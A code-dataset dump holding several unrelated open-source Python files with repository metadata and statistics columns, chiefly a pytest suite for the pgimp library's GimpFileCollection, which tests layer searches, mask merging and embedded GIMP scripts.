70d851d6489600c1e90eb25b0388a3ceba2f078c
|
[
"MIT"
] | null | null | null |
from .baseprocessor import BaseProcessor
class FB15K237Processor(BaseProcessor):
def __init__(self, node_lut, relation_lut, reprocess):
super().__init__("FB15K237", node_lut, relation_lut, reprocess)
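For orientation, a hypothetical instantiation; both lookup tables would be produced by CogKGE's data loaders, and the names below are placeholders rather than anything defined in this row:

# Hypothetical usage sketch; node_lut and relation_lut are assumed to be
# lookup tables built elsewhere in CogKGE.
processor = FB15K237Processor(node_lut, relation_lut, reprocess=True)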
| 30.571429
| 71
| 0.771028
| 23
| 214
| 6.652174
| 0.608696
| 0.091503
| 0.196078
| 0.235294
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.135514
| 214
| 6
| 72
| 35.666667
| 0.772973
| 0
| 0
| 0
| 0
| 0
| 0.037383
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
f9d3e8e17cb4d7f9fe9db4b44a63b0c8a9f8f65f
| 323
|
py
|
Python
|
test/suite/E27.py
|
shardros/autopep8
|
2ab2ea74668b10f3910f3d5b9526494fa5671ca1
|
[
"MIT"
] | 3,459
|
2015-01-03T15:53:43.000Z
|
2022-03-31T16:33:01.000Z
|
test/suite/E27.py
|
hayata-yamamoto/autopep8
|
107e29dce22c7b367a36633a78735278e4ad4288
|
[
"MIT"
] | 435
|
2015-01-03T12:58:44.000Z
|
2022-03-29T12:37:13.000Z
|
test/suite/E27.py
|
hayata-yamamoto/autopep8
|
107e29dce22c7b367a36633a78735278e4ad4288
|
[
"MIT"
] | 279
|
2015-03-16T16:34:51.000Z
|
2022-03-26T23:58:48.000Z
|
#: Okay
True and False
#: E271
True and  False
#: E272
True  and False
#: E271
if   1:
#: E273
True and	False
#: E273 E274
True	and	False
#: E271
a and  b
#: E271
1 and  b
#: E271
a and  2
#: E271 E272
1  and  b
#: E271 E272
a  and  2
#: E272
this  and False
#: E273
a and	b
#: E274
a	and b
#: E273 E274
this	and	False
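For reference, the pycodestyle codes exercised above are: E271 multiple spaces after a keyword, E272 multiple spaces before a keyword, E273 whitespace (a tab) after a keyword, and E274 a tab before a keyword. Each `#:` annotation names the violation the following line is meant to trigger, which is why the exact tab and double-space placement in this fixture matters.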
| 10.419355
| 15
| 0.613003
| 63
| 323
| 3.142857
| 0.222222
| 0.282828
| 0.30303
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.257642
| 0.291022
| 323
| 30
| 16
| 10.766667
| 0.606987
| 0.340557
| 0
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ddb88819c796db53b08989fe1a656955b84d1760
| 140
|
py
|
Python
|
application/blueprints/user/__init__.py
|
demetrius-mp/flask-template
|
2dbab372bf2d7d5ff60af430c4b69c95a41cd681
|
[
"MIT"
] | null | null | null |
application/blueprints/user/__init__.py
|
demetrius-mp/flask-template
|
2dbab372bf2d7d5ff60af430c4b69c95a41cd681
|
[
"MIT"
] | 2
|
2021-10-14T02:00:15.000Z
|
2021-10-14T02:19:44.000Z
|
application/blueprints/user/__init__.py
|
demetrius-mp/flask-template
|
2dbab372bf2d7d5ff60af430c4b69c95a41cd681
|
[
"MIT"
] | null | null | null |
from flask import Flask
from application.blueprints.user.routes import users
def init_app(app: Flask):
app.register_blueprint(users)
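A minimal wiring sketch for this app-factory hook (illustrative; it only assumes the package above is importable):

# Illustrative usage: create the app, then let init_app attach the blueprint.
from flask import Flask
from application.blueprints.user import init_app

app = Flask(__name__)
init_app(app)  # the routes defined on the `users` blueprint are now served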
| 17.5
| 52
| 0.792857
| 20
| 140
| 5.45
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135714
| 140
| 7
| 53
| 20
| 0.900826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0
| 0.75
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
34a5f721af5cc589bff5b78d011f713fac9b79a1
| 211
|
py
|
Python
|
smoothie/plugins/__init__.py
|
PiterPentester/smoothie
|
810709273c3d7bb975aca1f44062d39d0b33b678
|
[
"0BSD"
] | 1
|
2021-02-12T00:24:45.000Z
|
2021-02-12T00:24:45.000Z
|
smoothie/plugins/__init__.py
|
PiterPentester/smoothie
|
810709273c3d7bb975aca1f44062d39d0b33b678
|
[
"0BSD"
] | 1
|
2021-03-26T00:37:50.000Z
|
2021-03-26T00:37:50.000Z
|
smoothie/plugins/__init__.py
|
PiterPentester/smoothie
|
810709273c3d7bb975aca1f44062d39d0b33b678
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
from smoothie.plugins.interfaces import run as interfaces
from smoothie.plugins.list_networks import run as list_networks
from smoothie.plugins.target_network import run as target_network
| 35.166667
| 65
| 0.848341
| 32
| 211
| 5.46875
| 0.46875
| 0.205714
| 0.325714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099526
| 211
| 5
| 66
| 42.2
| 0.921053
| 0.094787
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
34b1459af9f8293d45f8ba2c83ea76abe97d3d5b
| 102
|
py
|
Python
|
core/src/autogluon/core/scheduler/resource/__init__.py
|
zhiqiangdon/autogluon
|
71ee7ef0f05d8f0aad112d8c1719174aa33194d9
|
[
"Apache-2.0"
] | 4,462
|
2019-12-09T17:41:07.000Z
|
2022-03-31T22:00:41.000Z
|
core/src/autogluon/core/scheduler/resource/__init__.py
|
zhiqiangdon/autogluon
|
71ee7ef0f05d8f0aad112d8c1719174aa33194d9
|
[
"Apache-2.0"
] | 1,408
|
2019-12-09T17:48:59.000Z
|
2022-03-31T20:24:12.000Z
|
core/src/autogluon/core/scheduler/resource/__init__.py
|
zhiqiangdon/autogluon
|
71ee7ef0f05d8f0aad112d8c1719174aa33194d9
|
[
"Apache-2.0"
] | 623
|
2019-12-10T02:04:18.000Z
|
2022-03-20T17:11:01.000Z
|
from .resource import *
from .dist_manager import *
from ...utils import get_cpu_count, get_gpu_count
| 25.5
| 49
| 0.794118
| 16
| 102
| 4.75
| 0.625
| 0.263158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127451
| 102
| 3
| 50
| 34
| 0.853933
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
34ea6bc99bdf93d5fbca0d7c5dabe8656d17800e
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/poetry/core/packages/constraints/union_constraint.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/poetry/core/packages/constraints/union_constraint.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/poetry/core/packages/constraints/union_constraint.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/a5/a1/10/06eab95524f667caa51362a09c577fd5f6d45980e5390034745c0a322f
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.46875
| 0
| 96
| 1
| 96
| 96
| 0.427083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
34f2d98b52c7839e3432965351129274c2ecd039
| 23,904
|
py
|
Python
|
pgimp/GimpFileCollectionTest.py
|
netogallo/pgimp
|
bb86254983e1673d702e1fa2ed207166fd15ec65
|
[
"MIT"
] | 5
|
2018-10-29T10:09:37.000Z
|
2020-12-28T04:47:32.000Z
|
pgimp/GimpFileCollectionTest.py
|
netogallo/pgimp
|
bb86254983e1673d702e1fa2ed207166fd15ec65
|
[
"MIT"
] | 1
|
2020-10-21T18:35:44.000Z
|
2021-06-17T06:27:26.000Z
|
pgimp/GimpFileCollectionTest.py
|
netogallo/pgimp
|
bb86254983e1673d702e1fa2ed207166fd15ec65
|
[
"MIT"
] | 4
|
2019-09-20T05:14:39.000Z
|
2021-04-05T01:55:47.000Z
|
# Copyright 2018 Mathias Burger <[email protected]>
#
# SPDX-License-Identifier: MIT
import os
import shutil
import textwrap
from tempfile import TemporaryDirectory
import numpy as np
import pytest
from pgimp.GimpFile import GimpFile, GimpFileType
from pgimp.GimpFileCollection import GimpFileCollection, NonExistingPathComponentException, \
GimpMissingRequiredParameterException, MaskForegroundColor
from pgimp.util import file
from pgimp.util.TempFile import TempFile
from pgimp.util.string import escape_single_quotes
def test_create_from_pathname_with_file():
prefix = file.relative_to(__file__, 'test-resources/files/')
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/first'))
assert len(collection.get_files()) == 1
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/first.xcf'))
assert len(collection.get_files()) == 1
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/first.png'))
assert len(collection.get_files()) == 0
assert '' == collection.get_prefix()
def test_create_from_pathname_with_directory():
prefix = file.relative_to(__file__, 'test-resources/files/')
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files'))
assert len(collection.get_files()) == 2
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/'))
assert len(collection.get_files()) == 2
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/*'))
assert len(collection.get_files()) == 2
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/*.xcf'))
assert len(collection.get_files()) == 2
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/*.png'))
assert len(collection.get_files()) == 0
assert '' == collection.get_prefix()
def test_create_from_pathname_with_recursive_match():
prefix = file.relative_to(__file__, 'test-resources/files/')
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
assert len(collection.get_files()) == 4
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**/'))
assert len(collection.get_files()) == 4
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**/*'))
assert len(collection.get_files()) == 4
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**/*.xcf'))
assert len(collection.get_files()) == 4
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**/*.png'))
assert len(collection.get_files()) == 0
assert '' == collection.get_prefix()
def test_ordering():
prefix = file.relative_to(__file__, 'test-resources/files/')
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
collection = collection.replace_prefix(prefix)
assert [
'first.xcf',
'second.xcf',
'a/third.xcf',
'a/b/fourth.xcf',
] == collection.get_files()
def test_replace_path_components():
prefix = file.relative_to(__file__, 'test-resources/files/')
suffix = '.xcf'
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
collection = collection.replace_path_components(prefix, '#', suffix, '%')
assert [
'#first%.xcf',
'#second%.xcf',
'#a/third%.xcf',
'#a/b/fourth%.xcf',
] == collection.get_files()
def test_replace_path_components_with_non_existing_component():
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
with pytest.raises(NonExistingPathComponentException):
collection.replace_path_components('wrong_prefix', '#')
def test_replace_path_components_without_replacements():
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
files_before = collection.get_files()
collection = collection.replace_path_components()
files_after = collection.get_files()
assert files_before == files_after
def test_find_files_containing_layer_by_predictate():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
files = collection.find_files_containing_layer_by_predictate(
lambda layers: 'White' in map(lambda layer: layer.name, layers)
)
assert len(files) == 1
assert with_white == files[0]
files = collection.find_files_containing_layer_by_predictate(
lambda layers: 'Not existing' in map(lambda layer: layer.name, layers)
)
assert len(files) == 0
def test_find_files_containing_layer_by_name():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
files = collection.find_files_containing_layer_by_name('White', timeout_in_seconds=10)
assert len(files) == 1
assert with_white == files[0]
files = collection.find_files_containing_layer_by_name('Not existing', timeout_in_seconds=10)
assert len(files) == 0
def test_find_files_by_script_with_script_that_takes_single_file():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
from pgimp.gimp.file import open_xcf
from pgimp.gimp.parameter import return_bool
image = open_xcf('__file__')
for layer in image.layers:
if layer.name == '{0:s}':
return_bool(True)
return_bool(False)
"""
)
files = collection.find_files_by_script(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
files = collection.find_files_by_script(script.format(escape_single_quotes('Not existing')), timeout_in_seconds=3)
assert len(files) == 0
def test_find_files_by_script_with_script_that_takes_multiple_files():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
import gimp
from pgimp.gimp.file import XcfFile
from pgimp.gimp.parameter import return_json, get_json
files = get_json('__files__')
matches = []
for file in files:
with XcfFile(file) as image:
for layer in image.layers:
if layer.name == '{0:s}':
matches.append(file)
return_json(matches)
"""
)
files = collection.find_files_by_script(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
files = collection.find_files_by_script(script.format(escape_single_quotes('Not existing')), timeout_in_seconds=3)
assert len(files) == 0
def test_find_files_by_script_without_required_parameters():
collection = GimpFileCollection([])
script = textwrap.dedent(
"""
print(1)
"""
)
with pytest.raises(GimpMissingRequiredParameterException):
collection.find_files_by_script(script, timeout_in_seconds=3)
def test_execute_script_and_return_json_with_script_that_takes_single_file():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
from pgimp.gimp.file import open_xcf
from pgimp.gimp.parameter import return_json
image = open_xcf('__file__')
for layer in image.layers:
if layer.name == '{0:s}':
return_json(True)
return_json(False)
"""
)
files = collection.execute_script_and_return_json(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert {
with_white: True,
without_white: False,
} == files
def test_execute_script_and_return_json_with_script_that_takes_multiple_files_using_open():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
import gimp
from pgimp.gimp.file import open_xcf
from pgimp.gimp.parameter import return_json, get_json
files = get_json('__files__')
matches = []
for file in files:
image = open_xcf(file)
for layer in image.layers:
if layer.name == '{0:s}':
matches.append(file)
gimp.pdb.gimp_image_delete(image)
return_json(matches)
"""
)
files = collection.execute_script_and_return_json(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
def test_execute_script_and_return_json_with_script_that_takes_multiple_files_using_xcf_file():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
import gimp
from pgimp.gimp.file import XcfFile
from pgimp.gimp.parameter import return_json, get_json
files = get_json('__files__')
matches = []
for file in files:
with XcfFile(file) as image:
for layer in image.layers:
if layer.name == '{0:s}':
matches.append(file)
return_json(matches)
"""
)
files = collection.execute_script_and_return_json(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
def test_execute_script_and_return_json_with_script_that_takes_multiple_files_using_for_each():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8) * 255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
from pgimp.gimp.file import for_each_file
from pgimp.gimp.parameter import return_json, get_json
matches = []
def layer_matches(image, file):
for layer in image.layers:
if layer.name == '{0:s}':
matches.append(file)
for_each_file(layer_matches)
return_json(matches)
"""
)
files = collection.execute_script_and_return_json(script.format(escape_single_quotes('White')),
timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
def test_copy_layer_from():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf'))\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
src_2 = GimpFile(os.path.join(srcdir, 'file2.xcf'))\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('White', np.zeros(shape=(1, 1), dtype=np.uint8)*255)
dst_2 = GimpFile(os.path.join(dstdir, 'file2.xcf')) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))
src_collection = GimpFileCollection([src_1.get_file(), src_2.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file(), dst_2.get_file()])
dst_collection.copy_layer_from(src_collection, 'White', layer_position=1, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('White') == 255)
assert ['Background', 'White'] == dst_1.layer_names()
assert 'White' in dst_2.layer_names()
assert np.all(dst_2.layer_to_numpy('White') == 255)
assert ['Background', 'White'] == dst_2.layer_names()
def test_merge_mask_layer_from_with_grayscale_and_foreground_color_white():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf'))\
.create('Mask', np.array([[255, 0]], dtype=np.uint8))
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create('Mask', np.array([[0, 255]], dtype=np.uint8))
dst_2 = GimpFile(os.path.join(dstdir, 'file2.xcf')) \
.create('Mask', np.array([[0, 255]], dtype=np.uint8))
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file(), dst_2.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.WHITE, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[255], [255]])
assert ['Mask'] == dst_1.layer_names()
assert 'Mask' in dst_2.layer_names()
assert np.all(dst_2.layer_to_numpy('Mask') == [[0], [255]])
assert ['Mask'] == dst_2.layer_names()
def test_merge_mask_layer_from_with_grayscale_and_foreground_color_black():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf'))\
.create('Mask', np.array([[255, 0]], dtype=np.uint8))
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create('Mask', np.array([[0, 255]], dtype=np.uint8))
dst_2 = GimpFile(os.path.join(dstdir, 'file2.xcf')) \
.create('Mask', np.array([[0, 255]], dtype=np.uint8))
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file(), dst_2.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.BLACK, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[0], [0]])
assert ['Mask'] == dst_1.layer_names()
assert 'Mask' in dst_2.layer_names()
assert np.all(dst_2.layer_to_numpy('Mask') == [[0], [255]])
assert ['Mask'] == dst_2.layer_names()
def test_merge_mask_layer_from_with_color():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf'))\
.create('Mask', np.array([[[255, 255, 255], [0, 0, 0]]], dtype=np.uint8))
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create('Mask', np.array([[[0, 0, 0], [255, 255, 255]]], dtype=np.uint8))
dst_2 = GimpFile(os.path.join(dstdir, 'file2.xcf')) \
.create('Mask', np.array([[[0, 0, 0], [255, 255, 255]]], dtype=np.uint8))
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file(), dst_2.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.WHITE, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[255, 255, 255], [255, 255, 255]])
assert ['Mask'] == dst_1.layer_names()
assert 'Mask' in dst_2.layer_names()
assert np.all(dst_2.layer_to_numpy('Mask') == [[0, 0, 0], [255, 255, 255]])
assert ['Mask'] == dst_2.layer_names()
def test_merge_mask_layer_from_with_mask_not_available_in_files_in_both_collections_and_foreground_color_white():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf')) \
.create_empty(2, 1, GimpFileType.GRAY)
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create_empty(2, 1, GimpFileType.GRAY)
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.WHITE, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[0], [0]])
assert ['Mask'] == dst_1.layer_names()
def test_merge_mask_layer_from_with_mask_not_available_in_files_in_both_collections_and_foreground_color_black():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf')) \
.create_empty(2, 1, GimpFileType.GRAY)
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create_empty(2, 1, GimpFileType.GRAY)
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.BLACK, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[255], [255]])
assert ['Mask'] == dst_1.layer_names()
def test_clear_selection():
file_with_selection_original = file.relative_to(__file__, 'test-resources/selection.xcf')
with TempFile('.xcf') as file_with_selection:
shutil.copyfile(file_with_selection_original, file_with_selection)
collection = GimpFileCollection([file_with_selection])
selections_before = _has_selections(collection)
assert selections_before[file_with_selection]
collection.clear_selection(timeout_in_seconds=10)
selections_after = _has_selections(collection)
assert not selections_after[file_with_selection]
def _has_selections(collection):
result = collection.execute_script_and_return_json(
textwrap.dedent(
"""
import gimp
from pgimp.gimp.parameter import get_json, return_json
from pgimp.gimp.file import XcfFile
files = get_json('__files__')
selections = {}
for file in files:
with XcfFile(file, save=True) as image:
selections[file] = not gimp.pdb.gimp_selection_is_empty(image)
return_json(selections)
"""
),
timeout_in_seconds=10
)
return result
def test_remove_layers_by_name():
data = np.array([[0, 255]], dtype=np.uint8)
with TemporaryDirectory('_files') as dir:
file1 = GimpFile(os.path.join(dir, 'file1.xcf')) \
.create('Background', data) \
.add_layer_from_numpy('Layer 1', data) \
.add_layer_from_numpy('Layer 2', data) \
.add_layer_from_numpy('Layer 3', data)
file2 = GimpFile(os.path.join(dir, 'file2.xcf')) \
.create('Background', data) \
.add_layer_from_numpy('Layer 1', data) \
.add_layer_from_numpy('Layer 2', data)
collection = GimpFileCollection([file1.get_file(), file2.get_file()])
collection.remove_layers_by_name(['Layer 1', 'Layer 3'], timeout_in_seconds=10)
assert file1.layer_names() == ['Layer 2', 'Background']
assert file2.layer_names() == ['Layer 2', 'Background']
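The recurring pattern in this test file: each GIMP-side script is passed as a string, with '__file__' and '__files__' acting as placeholders that GimpFileCollection fills in per file before execution. A condensed sketch of the predicate form, distilled from the tests above (it assumes a `collection` built as in those tests):

# Condensed sketch of the pattern above; '__file__' is substituted by pgimp.
import textwrap

script = textwrap.dedent(
    """
    from pgimp.gimp.file import open_xcf
    from pgimp.gimp.parameter import return_bool
    image = open_xcf('__file__')
    return_bool(any(layer.name == 'White' for layer in image.layers))
    """
)
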